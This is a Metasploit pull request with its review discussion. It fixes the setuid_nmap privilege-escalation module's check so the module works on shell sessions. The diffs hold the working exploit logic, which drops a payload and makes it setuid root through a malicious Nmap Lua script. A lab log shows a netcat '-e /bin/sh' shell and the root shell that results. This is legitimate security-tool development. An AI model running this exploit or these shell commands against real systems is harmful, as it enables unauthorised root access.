### PR TITLE
Fix Meterpreter-specific code in setuid_nmap

### LINKED ISSUE #9411: local_exploit_suggester - setuid_nmap - Post failed: NoMethodError undefined method `fs' for Session:shell
The `check` method in [`modules/exploits/unix/local/setuid_nmap.rb:54`](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/local/setuid_nmap.rb#L54) uses `session.fs.file.stat` which is not compatible with `shell` sessions, despite the module specifying [`'SessionTypes'  => [ 'shell', 'meterpreter' ]`](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/local/setuid_nmap.rb#L34)

Upgrading the `shell` session to `meterpreter` allows `Multi Recon Local Exploit Suggester` to function as expected.

## Steps to reproduce

```
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester 
msf post(multi/recon/local_exploit_suggester) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    172.16.191.244:1337 -> 172.16.191.252:51338 (172.16.191.252)

msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run

[*] 172.16.191.252 - Collecting local exploits for cmd/unix...
[*] 172.16.191.252 - 7 exploit checks are being tried...
[-] 172.16.191.252 - Post failed: NoMethodError undefined method `fs' for #<Session:shell 172.16.191.252:51338 (172.16.191.252) "">
[-] 172.16.191.252 - Call stack:
[-] 172.16.191.252 -   /pentest/exploit/metasploit-framework/modules/exploits/unix/local/setuid_nmap.rb:54:in `check'
[-] 172.16.191.252 -   /pentest/exploit/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:136:in `block in run'
[-] 172.16.191.252 -   /pentest/exploit/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:134:in `each'
[-] 172.16.191.252 -   /pentest/exploit/metasploit-framework/modules/post/multi/recon/local_exploit_suggester.rb:134:in `run'
[*] Post module execution completed
```

It's worth noting that a quick review of the `Setuid Nmap Exploit` module shows the exploit should work with either `shell` or `meterpreter` sessions - it's only the `check` method which is problematic.

As such, the module could probably be updated to use something like the following (which I stole from [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/local/vmware_mount.rb#L82)):

```ruby
  def setuid?(remote_file)
    cmd_exec("test -u '#{remote_file.strip}' && echo true").include?('true')
  end
```

### PR DESCRIPTION
**Pull request by wvu**
# ~WIP~

~This is more untested code. Pushing it up as a tentative fix.~ This works.

Fixes #9411? cc @bcoles

### CODE REVIEW

File: modules/exploits/unix/local/setuid_nmap.rb [hunk 1]
```diff
@@ -69,16 +68,16 @@ def exploit
       write_file(exe_file, generate_payload_exe)
       evil_lua = %Q{
         os.execute("chown root:root #{exe_file}");
```
Comment (wvu-r7) [inline modules/exploits/unix/local/setuid_nmap.rb]: Note to self: check these commands, especially with `PrependSetresuid`.

File: modules/exploits/unix/local/setuid_nmap.rb [hunk 2]
```diff
@@ -69,16 +68,16 @@ def exploit
...
         os.execute("#{exe_file} &");
-        os.execute("rm #{exe_file}");
+        os.execute("rm -f #{exe_file}");
       }
     end
     lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
     print_status("Dropping lua #{lua_file}")
     write_file(lua_file, evil_lua)
 
-    print_status("running")
```
Comment (wvu-r7) [inline modules/exploits/unix/local/setuid_nmap.rb]: Running WHAT? :-)

File: modules/exploits/unix/local/setuid_nmap.rb (hunk 1 above)
Comment (wvu-r7) [inline modules/exploits/unix/local/setuid_nmap.rb]: Note to self: check these commands, especially with `PrependSetresuid`.

File: modules/exploits/unix/local/setuid_nmap.rb (hunk 2 above)
Comment (wvu-r7) [inline modules/exploits/unix/local/setuid_nmap.rb]: Running WHAT? :-)

File: modules/exploits/unix/local/setuid_nmap.rb [hunk 3]
```diff
@@ -51,12 +51,11 @@ def initialize(info={})
   end
 
   def check
-    stat = session.fs.file.stat(datastore["Nmap"])
-    if stat and stat.file? and stat.setuid?
-      vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
-      return CheckCode::Vulnerable
+    if setuid?(datastore['Nmap'])
+      vprint_good("#{datastore['Nmap']} is setuid")
+      CheckCode::Vulnerable
```
Comment (bcoles) [inline modules/exploits/unix/local/setuid_nmap.rb]: This needs `return CheckCode::Vulnerable`

**Review by bcoles — CHANGES_REQUESTED** [review]

**Comment by bcoles** [comment]
Looks good to me.

Here's the output, with and without, the missing `return`, on Ubuntu 14 x86 client :

```
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set rhost 172.16.191.131
rhost => 172.16.191.131
msf5 exploit(multi/handler) > set lport 1337
lport => 1337
msf5 exploit(multi/handler) > set rport 1337
rport => 1337
msf5 exploit(multi/handler) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf5 exploit(multi/handler) > run

[*] Started bind handler
[*] Command shell session 1 opened (172.16.191.244:43399 -> 172.16.191.131:1337) at 2018-01-23 10:04:17 -0500

id
uid=1002(test) gid=1002(test) groups=1002(test)
^Z
Background session 1? [y/N]  y

msf5 exploit(multi/handler) > use exploit/unix/local/setuid_nmap 
nmsf5 exploit(unix/local/setuid_nmap) > set session 1
session => 1
msf5 exploit(unix/local/setuid_nmap) > check
[*]  The target is not exploitable.
msf5 exploit(unix/local/setuid_nmap) > reload
[*] Reloading module...
msf5 exploit(unix/local/setuid_nmap) > check
[+]  The target is vulnerable.
msf5 exploit(unix/local/setuid_nmap) > reload
[*] Reloading module...
msf5 exploit(unix/local/setuid_nmap) > check
[*]  The target is not exploitable.
msf5 exploit(unix/local/setuid_nmap) > reload
[*] Reloading module...
msf5 exploit(unix/local/setuid_nmap) > check
[+]  The target is vulnerable.
msf5 exploit(unix/local/setuid_nmap) > run

[*] Started reverse TCP double handler on 172.16.191.244:4444 
[*] Dropping lua /tmp/FNJnQLYi.nse
[*] Running /tmp/FNJnQLYi.nse with Nmap
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo hZiFA0clk93bkXuv;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "hZiFA0clk93bkXuv\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (172.16.191.244:4444 -> 172.16.191.131:57399) at 2018-01-23 10:12:34 -0500

id
uid=1002(test) gid=1002(test) euid=0(root) groups=0(root),1002(test)
```

Unrelated, for completeness, here's the console output:

```
$ nc.traditional -lvp 1337 -e /bin/sh
listening on [any] 1337 ...
172.16.191.244: inverse host lookup failed: Unknown host
connect to [172.16.191.131] from (UNKNOWN) [172.16.191.244] 43399
WARNING: Running Nmap setuid, as you are doing, is a major security risk.

NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:554: /usr/bin/../share/nmap/scripts/../../../../../../../../../../tmp/FNJnQLYi.nse is missing required field: 'action'
stack traceback:
	[C]: in function 'error'
	/usr/bin/../share/nmap/nse_main.lua:554: in function 'new'
	/usr/bin/../share/nmap/nse_main.lua:783: in function 'get_chosen_scripts'
	/usr/bin/../share/nmap/nse_main.lua:1271: in main chunk
	[C]: in ?

QUITTING!

^C
```

**Comment by bcoles** [comment]
Also unrelated, here was my diff during refactoring :

```diff
diff --git a/modules/exploits/unix/local/setuid_nmap.rb b/modules/exploits/unix/local/setuid_nmap.rb
index f10df3a..e7cc79b 100644
--- a/modules/exploits/unix/local/setuid_nmap.rb
+++ b/modules/exploits/unix/local/setuid_nmap.rb
@@ -3,15 +3,14 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core/exploit/exe'
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Exploit::EXE
   include Msf::Post::File
+  include Msf::Exploit::FileDropper
 
-  def initialize(info={})
+  def initialize(info = {})
     super( update_info( info, {
         'Name'          => 'Setuid Nmap Exploit',
         'Description'   => %q{
@@ -38,35 +37,48 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
             [ 'BSD x86',         { 'Arch' => ARCH_X86 } ],
           ],
-        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
-        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PrependSetresuid' => true, 'WfsDelay' => 2 },
+        'DefaultTarget' => 0
       }
       ))
     register_options([
         # These are not OptPath becuase it's a *remote* path
-        OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
-        OptString.new("Nmap",        [ true, "Path to setuid nmap executable", "/usr/bin/nmap" ]),
-        OptString.new("ExtraArgs",        [ false, "Extra arguments to pass to Nmap (e.g. --datadir)", "" ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+        OptString.new('Nmap',        [ true, 'Path to setuid nmap executable', '/usr/bin/nmap' ]),
+        OptString.new('ExtraArgs',   [ false, 'Extra arguments to pass to Nmap (e.g. --datadir)', '' ]),
       ])
   end
 
   def check
-    stat = session.fs.file.stat(datastore["Nmap"])
-    if stat and stat.file? and stat.setuid?
-      vprint_good("#{stat.prettymode} #{datastore["Nmap"]}")
+    if cmd_exec("[[ -s '#{nmap_path}' ]] && echo true").include?('true')
+      vprint_good("#{nmap_path} executable is suid")
       return CheckCode::Vulnerable
     end
-    return CheckCode::Safe
+
+    CheckCode::Safe
+  end
+
+  def base_dir
+    datastore['WritableDir']
+  end
+
+  def nmap_path
+    datastore['Nmap']
   end
 
   def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with(Failure::NotVulnerable, "#{nmap_path} executable is not suid")
+    end
+
     if (target.arch.include? ARCH_CMD)
       p = payload.encoded.gsub(/([$"])/) {|m| "\\#{$1}" }
       evil_lua = %Q{ os.execute("#{p} &") }
     else
-      exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
+      exe_file = "#{base_dir}/#{rand_text_alpha(8)}.elf"
       print_status("Dropping executable #{exe_file}")
       write_file(exe_file, generate_payload_exe)
+      register_file_for_cleanup exe_file
       evil_lua = %Q{
         os.execute("chown root:root #{exe_file}");
         os.execute("chmod 6777 #{exe_file}");
@@ -74,26 +86,22 @@ class MetasploitModule < Msf::Exploit::Local
         os.execute("rm #{exe_file}");
       }
     end
-    lua_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.nse"
+
+    lua_file = "#{base_dir}/#{rand_text_alpha(8)}.nse"
     print_status("Dropping lua #{lua_file}")
     write_file(lua_file, evil_lua)
-
-    print_status("running")
+    register_file_for_cleanup lua_file
 
     scriptname = lua_file
-    if (lua_file[0,1] == "/")
+    if lua_file.start_with?('/')
       # Versions before 4.51BETA (December 2007) only accept relative paths for script names
       # Figure 10 up-directory traversals is enough.
-      scriptname = ("../" * 10) + lua_file[1..-1]
+      scriptname = ('../' * 10) + lua_file[1..-1]
     end
 
-    begin
-      # Versions before 4.75 (August 2008) will not run scripts without a port scan
-      cmd_exec "#{datastore["Nmap"]} --script #{scriptname} -p80 localhost #{datastore["ExtraArgs"]}"
-    ensure
-      cmd_exec "rm -f #{lua_file} #{exe_file}"
-    end
+    print_status('Running nmap...')
 
+    # Versions before 4.75 (August 2008) will not run scripts without a port scan
+    cmd_exec "#{nmap_path} --script #{scriptname} -p80 localhost #{datastore['ExtraArgs']}"
   end
 end
-
```

File: modules/exploits/unix/local/setuid_nmap.rb (hunk 3 above)
Comment (wvu-r7) [reply modules/exploits/unix/local/setuid_nmap.rb]: Oops.

**Review by bcoles — APPROVED** [review]

File: modules/exploits/unix/local/setuid_nmap.rb (hunk 1 above)
Comment (wvu-r7) [reply modules/exploits/unix/local/setuid_nmap.rb]: Group might be `wheel` on BSD, and the lack of `PrependSetre*gid` makes me think SGID is optimistic but not necessary. Leaving it as is.

**Comment by wvu-r7** [comment]
# Release Notes

This updates the `exploit/unix/local/setuid_nmap` module to use the new `setuid?` method in the post-exploitation API, allowing the module to work on normal shell sessions now, not just Meterpreter.

**Pull request merged**